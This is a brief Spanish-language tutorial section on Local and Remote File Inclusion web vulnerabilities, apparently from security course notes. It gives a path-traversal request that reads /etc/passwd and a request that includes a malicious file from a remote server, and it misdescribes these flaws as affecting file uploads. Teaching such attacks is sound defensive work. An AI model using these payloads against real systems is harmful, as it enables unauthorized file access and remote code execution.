# 7. LFI/RFI

Estas vulnerabilidades afectan a la subida de ficheros en una aplicación web.

## 1. Local File Inclusion

Acceso a ficheros dentro de un mismo servidor, ejecutando código en la aplicación para acceder a recursos del servidor.

```
GET dominio.meow/ejemplolfi.php?file=../../../etc/passwd HTTP/1.1
```

## 2. Remote File Inclusion

Acceso a ficheros en servidores remotos.

```
GET dominio.meow/ejemplorfi.php?file=dominioRemoto/ficheroMalicioso HTTP/1.1
```

Recursos:

* <https://www.busybox.net/>
* <https://pentestmonkey.net/>